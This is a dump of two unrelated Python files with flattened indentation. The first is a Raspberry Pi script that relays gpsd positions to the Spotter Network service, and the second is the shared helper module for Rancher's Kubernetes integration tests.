TCP_IP = '127.0.0.1'
TCP_PORT = 2947
BUFFER_SIZE = 1024
START_MESSAGE = "?WATCH={\"enable\":true,\"json\":true}"
STOP_MESSAGE = "?WATCH={\"enable\":false}"
LOGIN_FILE = "/home/pi/SNPosition/SNLogin"
run = True
APPLICATION_ID = ""
seconds_since_update = 0.0
PosLock = threading.Lock()
oPosObject = SNPosObject
if len(sys.argv) > 1 and sys.argv[1] and sys.argv[1].lower() == '-i':
logging.basicConfig(filename='SNPositionUpdate.log', level=logging.INFO)
else:
logging.basicConfig(filename='SNPositionUpdate.log', level=logging.ERROR)
def LoadUserFile():
global APPLICATION_ID
loginfile = open(LOGIN_FILE)
for line in loginfile:
arLine = line.split("=")
if arLine[0] == "APPLICATIONID":
APPLICATION_ID = arLine[1]
def UpdatePos(dctPacket):
global oPosObject
if "time" in dctPacket.keys():
oPosObject.SetTime(oPosObject, dctPacket["time"])
else:
logging.info('No data available for "time"')
return
if "lat" in dctPacket.keys():
oPosObject.SetLat(oPosObject, dctPacket["lat"])
else:
logging.info('No data available for "lat"')
return
if "lon" in dctPacket.keys():
oPosObject.SetLon(oPosObject, dctPacket["lon"])
else:
logging.info('No data available for "lon"')
return
if "alt" in dctPacket.keys():
oPosObject.SetElev(oPosObject, dctPacket["alt"])
if "speed" in dctPacket.keys():
oPosObject.SetSpeed(oPosObject, dctPacket["speed"])
if "track" in dctPacket.keys():
oPosObject.SetDirection(oPosObject, dctPacket["track"])
def POSTUpdate():
global oPosObject
if not oPosObject.Changed(oPosObject):
return
pload = {
'id':APPLICATION_ID,
'report_at':oPosObject.Time(oPosObject).strftime('%Y-%m-%d %H:%M:%S'),
'lat':oPosObject.Lat(oPosObject),
'lon':oPosObject.Lon(oPosObject),
'elev':oPosObject.Elev(oPosObject),
'mph':oPosObject.Speed(oPosObject),
'dir':oPosObject.Direction(oPosObject),
'active':1,
'gps':1
}
#print(pload)
oRequest = requests.post("https://www.spotternetwork.org/positions/update", data = pload)
if oRequest.status_code == 200:
oPosObject.ResetChanged(oPosObject)
logging.info('SN Updated at ' + datetime.now().strftime('%Y-%m-%dT%H:%M:%S.%f'))
return True
else:
logging.error('HTTP Status: ' + oRequest.status_code + '; Update not successfully sent to SN at ' + datetime.now().strftime('%Y-%m-%dT%H:%M:%S.%f'))
return False
def ConnectToGPSD():
global PosLock
global run
oSocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
oSocket.connect((TCP_IP, TCP_PORT))
oSocket.send(START_MESSAGE.encode('utf-8'))
while run:
data = oSocket.recv(BUFFER_SIZE)
arObjects = data.splitlines()
for line in arObjects:
#print(line)
dctPacket = json.loads(line.decode('utf-8'))
if dctPacket["class"] == "TPV":
with PosLock:
UpdatePos(dctPacket)
def UpdateSpotterNetwork():
global seconds_since_update
global PosLock
while run:
if time.perf_counter() - seconds_since_update > 120:
with PosLock:
if POSTUpdate():
seconds_since_update = time.perf_counter()
LoadUserFile()
if APPLICATION_ID:
tGPSD = threading.Thread(target=ConnectToGPSD)
tGPSD.start()
tSNUpdate = threading.Thread(target=UpdateSpotterNetwork)
tSNUpdate.start()
tGPSD.join
tSNUpdate.join
exit()
|
common.py
|
import inspect
import json
import os
import random
import subprocess
import ssl
import time
import requests
import ast
import paramiko
import rancher
import pytest
from urllib.parse import urlparse
from rancher import ApiError
from lib.aws import AmazonWebServices
from copy import deepcopy
from threading import Lock
from threading import Thread
import websocket
import base64
DEFAULT_TIMEOUT = 120
DEFAULT_CATALOG_TIMEOUT = 15
DEFAULT_MONITORING_TIMEOUT = 180
DEFAULT_CLUSTER_STATE_TIMEOUT = 240
DEFAULT_MULTI_CLUSTER_APP_TIMEOUT = 300
DEFAULT_APP_DELETION_TIMEOUT = 360
CATTLE_TEST_URL = os.environ.get('CATTLE_TEST_URL', "")
CATTLE_API_URL = CATTLE_TEST_URL + "/v3"
CATTLE_AUTH_URL = \
CATTLE_TEST_URL + "/v3-public/localproviders/local?action=login"
ADMIN_TOKEN = os.environ.get('ADMIN_TOKEN', "None")
USER_TOKEN = os.environ.get('USER_TOKEN', "None")
USER_PASSWORD = os.environ.get('USER_PASSWORD', "None")
ADMIN_PASSWORD = os.environ.get('ADMIN_PASSWORD', "None")
kube_fname = os.path.join(os.path.dirname(os.path.realpath(__file__)),
"k8s_kube_config")
MACHINE_TIMEOUT = float(os.environ.get('RANCHER_MACHINE_TIMEOUT', "1200"))
TEST_OS = os.environ.get('RANCHER_TEST_OS', "linux")
TEST_IMAGE = os.environ.get('RANCHER_TEST_IMAGE', "sangeetha/mytestcontainer")
TEST_IMAGE_NGINX = os.environ.get('RANCHER_TEST_IMAGE_NGINX', "nginx")
TEST_IMAGE_OS_BASE = os.environ.get('RANCHER_TEST_IMAGE_OS_BASE', "ubuntu")
if TEST_OS == "windows":
DEFAULT_TIMEOUT = 300
skip_test_windows_os = pytest.mark.skipif(
TEST_OS == "windows",
reason='Tests Skipped for including Windows nodes cluster')
CLUSTER_NAME = os.environ.get("RANCHER_CLUSTER_NAME", "")
RANCHER_CLEANUP_CLUSTER = \
ast.literal_eval(os.environ.get('RANCHER_CLEANUP_CLUSTER', "True"))
env_file = os.path.join(
os.path.dirname(os.path.realpath(__file__)),
"rancher_env.config")
AWS_SSH_KEY_NAME = os.environ.get("AWS_SSH_KEY_NAME")
AWS_ACCESS_KEY_ID = os.environ.get("AWS_ACCESS_KEY_ID")
AWS_SECRET_ACCESS_KEY = os.environ.get("AWS_SECRET_ACCESS_KEY")
AWS_REGION = os.environ.get("AWS_REGION")
AWS_SUBNET = os.environ.get("AWS_SUBNET")
AWS_VPC = os.environ.get("AWS_VPC")
AWS_SG = os.environ.get("AWS_SG")
AWS_ZONE = os.environ.get("AWS_ZONE")
AWS_IAM_PROFILE = os.environ.get("AWS_IAM_PROFILE", "")
AWS_S3_BUCKET_NAME = os.environ.get("AWS_S3_BUCKET_NAME", "")
AWS_S3_BUCKET_FOLDER_NAME = os.environ.get("AWS_S3_BUCKET_FOLDER_NAME", "")
LINODE_ACCESSKEY = os.environ.get('RANCHER_LINODE_ACCESSKEY', "None")
NFS_SERVER_MOUNT_PATH = "/nfs"
TEST_RBAC = ast.literal_eval(os.environ.get('RANCHER_TEST_RBAC', "False"))
if_test_rbac = pytest.mark.skipif(TEST_RBAC is False,
reason='rbac tests are skipped')
TEST_ALL_SNAPSHOT = ast.literal_eval(
os.environ.get('RANCHER_TEST_ALL_SNAPSHOT', "False")
)
if_test_all_snapshot = \
pytest.mark.skipif(TEST_ALL_SNAPSHOT is False,
reason='Snapshots check tests are skipped')
DATA_SUBDIR = os.path.join(os.path.dirname(os.path.realpath(__file__)),
'resource')
# As of release 2.4 default rke scan profile is "rke-cis-1.4"
CIS_SCAN_PROFILE = os.environ.get('RANCHER_CIS_SCAN_PROFILE', "rke-cis-1.4")
# here are all supported roles for RBAC testing
CLUSTER_MEMBER = "cluster-member"
CLUSTER_OWNER = "cluster-owner"
PROJECT_MEMBER = "project-member"
PROJECT_OWNER = "project-owner"
PROJECT_READ_ONLY = "read-only"
rbac_data = {
"project": None,
"namespace": None,
"workload": None,
"p_unshared": None,
"ns_unshared": None,
"wl_unshared": None,
"users": {
CLUSTER_OWNER: {},
CLUSTER_MEMBER: {},
PROJECT_OWNER: {},
PROJECT_MEMBER: {},
PROJECT_READ_ONLY: {},
}
}
auth_rbac_data = {
"project": None,
"namespace": None,
"users": {}
}
# here are the global role templates used for
# testing globalRoleBinding and groupRoleBinding
TEMPLATE_MANAGE_CATALOG = {
"newUserDefault": "false",
"rules": [
{
"type": "/v3/schemas/policyRule",
"apiGroups": [
"management.cattle.io"
],
"verbs": [
"*"
],
"resources": [
"catalogs",
"templates",
"templateversions"
]
}
],
"name": "gr-test-manage-catalog",
}
TEMPLATE_LIST_CLUSTER = {
"newUserDefault": "false",
"rules": [
{
"type": "/v3/schemas/policyRule",
"apiGroups": [
"management.cattle.io"
],
"verbs": [
"get",
"list",
"watch"
],
"resources": [
"clusters"
]
}
],
"name": "gr-test-list-cluster",
}
# this is used when testing users from a auth provider
AUTH_PROVIDER = os.environ.get('RANCHER_AUTH_PROVIDER', "")
if AUTH_PROVIDER not in ["activeDirectory", "freeIpa", "openLdap", ""]:
pytest.fail("Invalid RANCHER_AUTH_PROVIDER. Please provide one of: "
"activeDirectory, freeIpa, or openLdap (case sensitive).")
NESTED_GROUP_ENABLED = ast.literal_eval(
os.environ.get('RANCHER_NESTED_GROUP_ENABLED', "False"))
# Admin Auth username and the shared password for all auth users
AUTH_USER_PASSWORD = os.environ.get('RANCHER_AUTH_USER_PASSWORD', "")
# the link to log in as an auth user
LOGIN_AS_AUTH_USER_URL = \
CATTLE_TEST_URL + "/v3-public/" \
+ AUTH_PROVIDER + "Providers/" \
+ AUTH_PROVIDER.lower() + "?action=login"
CATTLE_AUTH_PRINCIPAL_URL = CATTLE_TEST_URL + "/v3/principals?action=search"
# This is used for nested group when a third part Auth is enabled
nested_group = {
"auth_info": None,
"users": None,
"group_dic": None,
"groups": None
}
auth_requirements = not AUTH_PROVIDER or not AUTH_USER_PASSWORD
if_test_group_rbac = pytest.mark.skipif(
auth_requirements,
reason='Group RBAC tests are skipped.'
'Required AUTH env variables '
'have not been set.'
)
# -----------------------------------------------------------------------------
# global variables from test_create_ha.py
test_run_id = "test" + str(random.randint(10000, 99999))
RANCHER_HOSTNAME_PREFIX = os.environ.get("RANCHER_HOSTNAME_PREFIX",
test_run_id)
# -----------------------------------------------------------------------------
# this is used for testing rbac v2
test_rbac_v2 = os.environ.get("RANCHER_TEST_RBAC_V2", "False")
if_test_rbac_v2 = pytest.mark.skipif(test_rbac_v2 != "True",
reason='test for rbac v2 is skipped')
def is_windows(os_type=TEST_OS):
return os_type == "windows"
def random_str():
return 'random-{0}-{1}'.format(random_num(), int(time.time()))
def random_num():
return random.randint(0, 1000000)
def random_int(start, end):
return random.randint(start, end)
def random_test_name(name="test"):
return name + "-" + str(random_int(10000, 99999))
def get_admin_client():
return rancher.Client(url=CATTLE_API_URL, token=ADMIN_TOKEN, verify=False)
def get_user_client():
return rancher.Client(url=CATTLE_API_URL, token=USER_TOKEN, verify=False)
def get_client_for_token(token, url=CATTLE_API_URL):
return rancher.Client(url=url, token=token, verify=False)
def get_project_client_for_token(project, token):
p_url = project.links['self'] + '/schemas'
p_client = rancher.Client(url=p_url, token=token, verify=False)
return p_client
def get_cluster_client_for_token(cluster, token):
c_url = cluster.links['self'] + '/schemas'
c_client = rancher.Client(url=c_url, token=token, verify=False)
return c_client
def up(cluster, token):
c_url = cluster.links['self'] + '/schemas'
c_client = rancher.Client(url=c_url, token=token, verify=False)
return c_client
def wait_state(client, obj, state, timeout=DEFAULT_TIMEOUT):
wait_for(lambda: client.reload(obj).state == state, timeout)
return client.reload(obj)
def wait_for_condition(client, resource, check_function, fail_handler=None,
timeout=DEFAULT_TIMEOUT):
start = time.time()
resource = client.reload(resource)
while not check_function(resource):
if time.time() - start > timeout:
exceptionMsg = 'Timeout waiting for ' + resource.baseType + \
' to satisfy condition: ' + \
inspect.getsource(check_function)
if fail_handler:
exceptionMsg = exceptionMsg + fail_handler(resource)
raise Exception(exceptionMsg)
time.sleep(.5)
resource = client.reload(resource)
return resource
def wait_for(callback, timeout=DEFAULT_TIMEOUT, timeout_message=None):
start = time.time()
ret = callback()
while ret is None or ret is False:
time.sleep(.5)
if time.time() - start > timeout:
if timeout_message:
raise Exception(timeout_message)
else:
raise Exception('Timeout waiting for condition')
ret = callback()
return ret
def random_name():
return "test" + "-" + str(random_int(10000, 99999))
def get_setting_value_by_name(name):
settings_url = CATTLE_API_URL + "/settings/" + name
head = {'Authorization': 'Bearer ' + ADMIN_TOKEN}
response = requests.get(settings_url, verify=False, headers=head)
return response.json()["value"]
# Return value is negative if v1 < v2, zero if v1 == v2 and positive if v1 > v2
def compare_versions(v1, v2):
if tuple(map(int, (v1.split(".")))) > tuple(map(int, (v2.split(".")))):
return 1
elif tuple(map(int, (v1.split(".")))) < tuple(map(int, (v2.split(".")))):
return -1
else:
return 0
def create_project_and_ns(token, cluster, project_name=None, ns_name=None):
server_url = cluster.links['self'].split("/clusters")[0]
client = get_client_for_token(token, server_url)
p = create_project(client, cluster, project_name)
c_client = get_cluster_client_for_token(cluster, token)
ns = create_ns(c_client, cluster, p, ns_name)
return p, ns
def create_project(client, cluster, project_name=None):
if project_name is None:
project_name = random_name()
p = client.create_project(name=project_name,
clusterId=cluster.id)
time.sleep(5)
p = wait_until_available(client, p)
assert p.state == 'active'
return p
def create_project_with_pspt(client, cluster, pspt):
p = client.create_project(name=random_name(),
clusterId=cluster.id)
p = wait_until_available(client, p)
assert p.state == 'active'
return set_pspt_for_project(p, client, pspt)
def set_pspt_for_project(project, client, pspt):
project.setpodsecuritypolicytemplate(podSecurityPolicyTemplateId=pspt.id)
project = wait_until_available(client, project)
assert project.state == 'active'
return project
def create_ns(client, cluster, project, ns_name=None):
if ns_name is None:
ns_name = random_name()
ns = client.create_namespace(name=ns_name,
clusterId=cluster.id,
projectId=project.id)
wait_for_ns_to_become_active(client, ns)
ns = client.reload(ns)
assert ns.state == 'active'
return ns
def assign_members_to_cluster(client, user, cluster, role_template_id):
crtb = client.create_cluster_role_template_binding(
clusterId=cluster.id,
roleTemplateId=role_template_id,
subjectKind="User",
userId=user.id)
return crtb
def assign_members_to_project(client, user, project, role_template_id):
prtb = client.create_project_role_template_binding(
projectId=project.id,
roleTemplateId=role_template_id,
subjectKind="User",
userId=user.id)
return prtb
def change_member_role_in_cluster(client, user, crtb, role_template_id):
crtb = client.update(
crtb,
roleTemplateId=role_template_id,
userId=user.id)
return crtb
def change_member_role_in_project(client, user, prtb, role_template_id):
prtb = client.update(
prtb,
roleTemplateId=role_template_id,
userId=user.id)
return prtb
def create_kubeconfig(cluster, file_name=kube_fname):
generateKubeConfigOutput = cluster.generateKubeconfig()
print(generateKubeConfigOutput.config)
file = open(file_name, "w")
file.write(generateKubeConfigOutput.config)
file.close()
def validate_psp_error_worklaod(p_client, workload, error_message):
workload = wait_for_wl_transitioning(p_client, workload)
assert workload.state == "updating"
assert workload.transitioning == "error"
print(workload.transitioningMessage)
assert error_message in workload.transitioningMessage
def validate_all_workload_image_from_rancher(project_client, ns, pod_count=1,
ignore_pod_count=False,
deployment_list=None,
daemonset_list=None,
cronjob_list=None):
if cronjob_list is None:
cronjob_list = []
if daemonset_list is None:
daemonset_list = []
if deployment_list is None:
deployment_list = []
workload_list = deployment_list + daemonset_list + cronjob_list
wls = project_client.list_workload(namespaceId=ns.id).data
assert len(workload_list) == len(wls), \
"Expected {} workload(s) to be present in {} namespace " \
"but there were {}".format(len(workload_list), ns.name, len(wls))
for workload_name in workload_list:
workloads = project_client.list_workload(name=workload_name,
namespaceId=ns.id).data
assert len(workloads) == workload_list.count(workload_name), \
"Expected {} workload(s) to be present with name {} " \
"but there were {}".format(workload_list.count(workload_name),
workload_name, len(workloads))
for workload in workloads:
for container in workload.containers:
assert str(container.image).startswith("rancher/")
if workload_name in deployment_list:
validate_workload(project_client, workload, "deployment",
ns.name, pod_count=pod_count,
ignore_pod_count=ignore_pod_count)
deployment_list.remove(workload_name)
if workload_name in daemonset_list:
validate_workload(project_client, workload, "daemonSet",
ns.name, pod_count=pod_count,
ignore_pod_count=ignore_pod_count)
daemonset_list.remove(workload_name)
if workload_name in cronjob_list:
validate_workload(project_client, workload, "cronJob",
ns.name, pod_count=pod_count,
ignore_pod_count=ignore_pod_count)
cronjob_list.remove(workload_name)
# Final assertion to ensure all expected workloads have been validated
assert not deployment_list + daemonset_list + cronjob_list
def validate_workload(p_client, workload, type, ns_name, pod_count=1,
wait_for_cron_pods=60, ignore_pod_count=False):
workload = wait_for_wl_to_active(p_client, workload)
assert workload.state == "active"
# For cronjob, wait for the first pod to get created after
# scheduled wait time
if type == "cronJob":
time.sleep(wait_for_cron_pods)
if ignore_pod_count:
pods = p_client.list_pod(workloadId=workload.id).data
else:
pods = wait_for_pods_in_workload(p_client, workload, pod_count)
assert len(pods) == pod_count
pods = p_client.list_pod(workloadId=workload.id).data
assert len(pods) == pod_count
for pod in pods:
p = wait_for_pod_to_running(p_client, pod)
assert p["status"]["phase"] == "Running"
wl_result = execute_kubectl_cmd(
"get " + type + " " + workload.name + " -n " + ns_name)
if type == "deployment" or type == "statefulSet":
assert wl_result["status"]["readyReplicas"] == len(pods)
if type == "daemonSet":
assert wl_result["status"]["currentNumberScheduled"] == len(pods)
if type == "cronJob":
assert len(wl_result["status"]["active"]) >= len(pods)
def validate_workload_with_sidekicks(p_client, workload, type, ns_name,
pod_count=1):
workload = wait_for_wl_to_active(p_client, workload)
assert workload.state == "active"
pods = wait_for_pods_in_workload(p_client, workload, pod_count)
assert len(pods) == pod_count
for pod in pods:
wait_for_pod_to_running(p_client, pod)
wl_result = execute_kubectl_cmd(
"get " + type + " " + workload.name + " -n " + ns_name)
assert wl_result["status"]["readyReplicas"] == pod_count
for key, value in workload.workloadLabels.items():
label = key + "=" + value
get_pods = "get pods -l" + label + " -n " + ns_name
execute_kubectl_cmd(get_pods)
pods_result = execute_kubectl_cmd(get_pods)
assert len(pods_result["items"]) == pod_count
for pod in pods_result["items"]:
assert pod["status"]["phase"] == "Running"
assert len(pod["status"]["containerStatuses"]) == 2
assert "running" in pod["status"]["containerStatuses"][0]["state"]
assert "running" in pod["status"]["containerStatuses"][1]["state"]
def validate_workload_paused(p_client, workload, expectedstatus):
workloadStatus = p_client.list_workload(uuid=workload.uuid).data[0].paused
assert workloadStatus == expectedstatus
def validate_pod_images(expectedimage, workload, ns_name):
for key, value in workload.workloadLabels.items():
label = key + "=" + value
get_pods = "get pods -l" + label + " -n " + ns_name
pods = execute_kubectl_cmd(get_pods)
for pod in pods["items"]:
assert pod["spec"]["containers"][0]["image"] == expectedimage
def validate_pods_are_running_by_id(expectedpods, workload, ns_name):
for key, value in workload.workloadLabels.items():
label = key + "=" + value
get_pods = "get pods -l" + label + " -n " + ns_name
pods = execute_kubectl_cmd(get_pods)
curpodnames = []
for pod in pods["items"]:
curpodnames.append(pod["metadata"]["name"])
for expectedpod in expectedpods["items"]:
assert expectedpod["metadata"]["name"] in curpodnames
def validate_workload_image(client, workload, expectedImage, ns):
workload = client.list_workload(uuid=workload.uuid).data[0]
assert workload.containers[0].image == expectedImage
validate_pod_images(expectedImage, workload, ns.name)
def execute_kubectl_cmd(cmd, json_out=True, stderr=False,
kubeconfig=kube_fname):
command = 'kubectl --kubeconfig {0} {1}'.format(
kubeconfig, cmd)
if json_out:
command += ' -o json'
print("run cmd: \t{0}".format(command))
if stderr:
result = run_command_with_stderr(command, False)
else:
result = run_command(command, False)
print("returns: \t{0}".format(result))
if json_out:
result = json.loads(result)
return result
def run_command(command, log_out=True):
if log_out:
print("run cmd: \t{0}".format(command))
try:
return subprocess.check_output(command, shell=True, text=True)
except subprocess.CalledProcessError as e:
return None
def run_command_with_stderr(command, log_out=True):
if log_out:
print("run cmd: \t{0}".format(command))
try:
output = subprocess.check_output(command, shell=True,
stderr=subprocess.PIPE)
returncode = 0
except subprocess.CalledProcessError as e:
output = e.stderr
returncode = e.returncode
if log_out:
print("return code: \t{0}".format(returncode))
if returncode != 0:
print("output: \t{0}".format(output))
return output
def wait_for_wl_to_active(client, workload, timeout=DEFAULT_TIMEOUT):
start = time.time()
workloads = client.list_workload(uuid=workload.uuid).data
assert len(workloads) == 1
wl = workloads[0]
while wl.state != "active":
if time.time() - start > timeout:
raise AssertionError(
"Timed out waiting for state to get to active")
time.sleep(.5)
workloads = client.list_workload(uuid=workload.uuid).data
assert len(workloads) == 1
wl = workloads[0]
return wl
def wait_for_ingress_to_active(client, ingress, timeout=DEFAULT_TIMEOUT):
start = time.time()
ingresses = client.list_ingress(uuid=ingress.uuid).data
assert len(ingresses) == 1
wl = ingresses[0]
while wl.state != "active":
if time.time() - start > timeout:
raise AssertionError(
"Timed out waiting for state to get to active")
time.sleep(.5)
ingresses = client.list_ingress(uuid=ingress.uuid).data
assert len(ingresses) == 1
wl = ingresses[0]
return wl
def wait_for_wl_transitioning(client, workload, timeout=DEFAULT_TIMEOUT,
state="error"):
start = time.time()
workloads = client.list_workload(uuid=workload.uuid).data
assert len(workloads) == 1
wl = workloads[0]
while wl.transitioning != state:
if time.time() - start > timeout:
raise AssertionError(
"Timed out waiting for state to get to active")
time.sleep(.5)
workloads = client.list_workload(uuid=workload.uuid).data
assert len(workloads) == 1
wl = workloads[0]
return wl
def wait_for_pod_to_running(client, pod, timeout=DEFAULT_TIMEOUT):
start = time.time()
pods = client.list_pod(uuid=pod.uuid).data
assert len(pods) == 1
p = pods[0]
while p.state != "running":
if time.time() - start > timeout:
raise AssertionError(
"Timed out waiting for state to get to active")
time.sleep(.5)
pods = client.list_pod(uuid=pod.uuid).data
assert len(pods) == 1
p = pods[0]
return p
def get_schedulable_nodes(cluster, client=None, os_type=TEST_OS):
if not client:
client = get_user_client()
nodes = client.list_node(clusterId=cluster.id).data
schedulable_nodes = []
for node in nodes:
if node.worker and (not node.unschedulable):
for key, val in node.labels.items():
# Either one of the labels should be present on the node
if key == 'kubernetes.io/os' or key == 'beta.kubernetes.io/os':
if val == os_type:
schedulable_nodes.append(node)
break
# Including master in list of nodes as master is also schedulable
if 'k3s' in cluster.version["gitVersion"] and node.controlPlane:
schedulable_nodes.append(node)
return schedulable_nodes
def get_etcd_nodes(cluster, client=None):
if not client:
client = get_user_client()
nodes = client.list_node(clusterId=cluster.id).data
etcd_nodes = []
for node in nodes:
if node.etcd:
etcd_nodes.append(node)
return etcd_nodes
def get_role_nodes(cluster, role, client=None):
etcd_nodes = []
control_nodes = []
worker_nodes = []
node_list = []
if not client:
client = get_user_client()
nodes = client.list_node(clusterId=cluster.id).data
for node in nodes:
if node.etcd:
etcd_nodes.append(node)
if node.controlPlane:
control_nodes.append(node)
if node.worker:
worker_nodes.append(node)
if role == "etcd":
node_list = etcd_nodes
if role == "control":
node_list = control_nodes
if role == "worker":
node_list = worker_nodes
return node_list
def validate_ingress(p_client, cluster, workloads, host, path,
insecure_redirect=False):
time.sleep(10)
curl_args = " "
if (insecure_redirect):
curl_args = " -L --insecure "
if len(host) > 0:
curl_args += " --header 'Host: " + host + "'"
nodes = get_schedulable_nodes(cluster, os_type="linux")
target_name_list = get_target_names(p_client, workloads)
for node in nodes:
host_ip = resolve_node_ip(node)
url = "http://" + host_ip + path
if not insecure_redirect:
wait_until_ok(url, timeout=300, headers={
"Host": host
})
cmd = curl_args + " " + url
validate_http_response(cmd, target_name_list)
def validate_ingress_using_endpoint(p_client, ingress, workloads,
timeout=300,
certcheck=False, is_insecure=False):
target_name_list = get_target_names(p_client, workloads)
start = time.time()
fqdn_available = False
url = None
while not fqdn_available:
if time.time() - start > timeout:
raise AssertionError(
"Timed out waiting for endpoint to be available")
time.sleep(.5)
ingress_list = p_client.list_ingress(uuid=ingress.uuid).data
assert len(ingress_list) == 1
ingress = ingress_list[0]
if hasattr(ingress, 'publicEndpoints'):
for public_endpoint in ingress.publicEndpoints:
if public_endpoint["hostname"].startswith(ingress.name) \
or certcheck:
fqdn_available = True
url = \
public_endpoint["protocol"].lower() + "://" + \
public_endpoint["hostname"]
if "path" in public_endpoint.keys():
url += public_endpoint["path"]
time.sleep(10)
validate_http_response(url, target_name_list, insecure=is_insecure)
def get_target_names(p_client, workloads):
pods = []
for workload in workloads:
pod_list = p_client.list_pod(workloadId=workload.id).data
pods.extend(pod_list)
target_name_list = []
for pod in pods:
target_name_list.append(pod.name)
print("target name list:" + str(target_name_list))
return target_name_list
def get_endpoint_url_for_workload(p_client, workload, timeout=600):
fqdn_available = False
url = ""
start = time.time()
while not fqdn_available:
if time.time() - start > timeout:
raise AssertionError(
"Timed out waiting for endpoint to be available")
time.sleep(.5)
workload_list = p_client.list_workload(uuid=workload.uuid).data
assert len(workload_list) == 1
workload = workload_list[0]
if hasattr(workload, 'publicEndpoints'):
assert len(workload.publicEndpoints) > 0
url = "http://"
url = url + workload.publicEndpoints[0]["addresses"][0] + ":"
url = url + str(workload.publicEndpoints[0]["port"])
fqdn_available = True
return url
def wait_until_lb_is_active(url, timeout=300):
start = time.time()
while check_for_no_access(url):
time.sleep(.5)
print("No access yet")
if time.time() - start > timeout:
raise Exception('Timed out waiting for LB to become active')
return
def check_for_no_access(url, verify=False):
try:
requests.get(url, verify=verify)
return False
except requests.ConnectionError:
print("Connection Error - " + url)
return True
def wait_until_active(url, timeout=120):
start = time.time()
while check_for_no_access(url):
time.sleep(.5)
print("No access yet")
if time.time() - start > timeout:
raise Exception('Timed out waiting for url '
'to become active')
return
def wait_until_ok(url, timeout=120, headers={}):
start = time.time()
while not check_if_ok(url, headers=headers):
time.sleep(.5)
if time.time() - start > timeout:
raise Exception(
'Timed out waiting for {0} to become ok'.format(url)
)
return
def wait_for_status_code(url, expected_code=200, timeout=DEFAULT_TIMEOUT):
start = time.time()
r = requests.get(url, verify=False)
while r.status_code != expected_code:
time.sleep(1)
r = requests.get(url, verify=False)
if time.time() - start > timeout:
raise Exception(
'Timed out waiting for status code {0}'
', actual code {1}'.format(
expected_code, r.status_code
)
)
return
def check_if_ok(url, verify=False, headers={}):
try:
res = requests.head(url, verify=verify, headers=headers)
if res.status_code == 200:
return True
return False
except requests.ConnectionError:
print("Connection Error - " + url)
return False
def validate_http_response(cmd, target_name_list, client_pod=None,
insecure=False):
if client_pod is None and cmd.startswith("http://"):
wait_until_active(cmd, 60)
target_hit_list = target_name_list[:]
count = 5 * len(target_name_list)
for i in range(1, count):
if len(target_hit_list) == 0:
break
if client_pod is None:
curl_cmd = "curl " + cmd
if insecure:
curl_cmd += "\t--insecure"
result = run_command(curl_cmd)
else:
if is_windows():
wget_cmd = 'powershell -NoLogo -NonInteractive -Command ' \
'"& {{ (Invoke-WebRequest -UseBasicParsing -Uri ' \
'{0}).Content }}"'.format(cmd)
else:
wget_cmd = "wget -qO- " + cmd
result = kubectl_pod_exec(client_pod, wget_cmd)
result = result.decode()
result = result.rstrip()
assert result in target_name_list
if result in target_hit_list:
target_hit_list.remove(result)
print("After removing all, the rest is: ", target_hit_list)
assert len(target_hit_list) == 0
def validate_cluster(client, cluster, intermediate_state="provisioning",
check_intermediate_state=True, skipIngresscheck=True,
nodes_not_in_active_state=[], k8s_version="",
userToken=USER_TOKEN, timeout=MACHINE_TIMEOUT):
# Allow sometime for the "cluster_owner" CRTB to take effect
time.sleep(5)
cluster = validate_cluster_state(
client, cluster,
check_intermediate_state=check_intermediate_state,
intermediate_state=intermediate_state,
nodes_not_in_active_state=nodes_not_in_active_state,
timeout=timeout)
create_kubeconfig(cluster)
if k8s_version != "":
check_cluster_version(cluster, k8s_version)
if hasattr(cluster, 'rancherKubernetesEngineConfig'):
check_cluster_state(len(get_role_nodes(cluster, "etcd", client)))
# check all workloads under the system project are active
# wait for workloads to be active
# time.sleep(DEFAULT_TIMEOUT)
print("checking if workloads under the system project are active")
sys_project = client.list_project(name='System',
clusterId=cluster.id).data[0]
sys_p_client = get_project_client_for_token(sys_project, userToken)
for wl in sys_p_client.list_workload().data:
"""to help run KDM job faster (when there are many clusters),
timeout=300 is set"""
wait_for_wl_to_active(sys_p_client, wl, timeout=300)
# Create Daemon set workload and have an Ingress with Workload
# rule pointing to this daemonSet
project, ns = create_project_and_ns(userToken, cluster)
p_client = get_project_client_for_token(project, userToken)
con = [{"name": "test1",
"image": TEST_IMAGE}]
name = random_test_name("default")
workload = p_client.create_workload(name=name,
containers=con,
namespaceId=ns.id,
daemonSetConfig={})
validate_workload(p_client, workload, "daemonSet", ns.name,
len(get_schedulable_nodes(cluster, client)))
if not skipIngresscheck:
pods = p_client.list_pod(workloadId=workload["id"]).data
scale = len(pods)
# test service discovery
validate_service_discovery(workload, scale, p_client, ns, pods)
host = "test" + str(random_int(10000, 99999)) + ".com"
path = "/name.html"
rule = {"host": host,
"paths":
[{"workloadIds": [workload.id], "targetPort": "80"}]}
ingress = p_client.create_ingress(name=name,
namespaceId=ns.id,
rules=[rule])
wait_for_ingress_to_active(p_client, ingress)
validate_ingress(p_client, cluster, [workload], host, path)
return cluster
def check_cluster_version(cluster, version):
cluster_k8s_version = \
cluster.appliedSpec["rancherKubernetesEngineConfig"][
"kubernetesVersion"]
assert cluster_k8s_version == version, \
"cluster_k8s_version: " + cluster_k8s_version + \
" Expected: " + version
expected_k8s_version = version[:version.find("-rancher")]
k8s_version = execute_kubectl_cmd("version")
kubectl_k8s_version = k8s_version["serverVersion"]["gitVersion"]
assert kubectl_k8s_version == expected_k8s_version, \
"kubectl version: " + kubectl_k8s_version + \
" Expected: " + expected_k8s_version
def check_cluster_state(etcd_count):
css_resp = execute_kubectl_cmd("get cs")
css = css_resp["items"]
components = ["scheduler", "controller-manager"]
for i in range(0, etcd_count):
components.append("etcd-" + str(i))
print("components to check - " + str(components))
for cs in css:
component_name = cs["metadata"]["name"]
assert component_name in components
components.remove(component_name)
assert cs["conditions"][0]["status"] == "True"
assert cs["conditions"][0]["type"] == "Healthy"
assert len(components) == 0
def validate_dns_record(pod, record, expected):
# requires pod with `dig` available - TEST_IMAGE
host = '{0}.{1}.svc.cluster.local'.format(
record["name"], record["namespaceId"])
validate_dns_entry(pod, host, expected)
def validate_dns_entry(pod, host, expected):
if is_windows():
validate_dns_entry_windows(pod, host, expected)
return
# requires pod with `dig` available - TEST_IMAGE
cmd = 'ping -c 1 -W 1 {0}'.format(host)
ping_output = kubectl_pod_exec(pod, cmd)
ping_validation_pass = False
for expected_value in expected:
if expected_value in str(ping_output):
ping_validation_pass = True
break
assert ping_validation_pass is True
assert " 0% packet loss" in str(ping_output)
dig_cmd = 'dig {0} +short'.format(host)
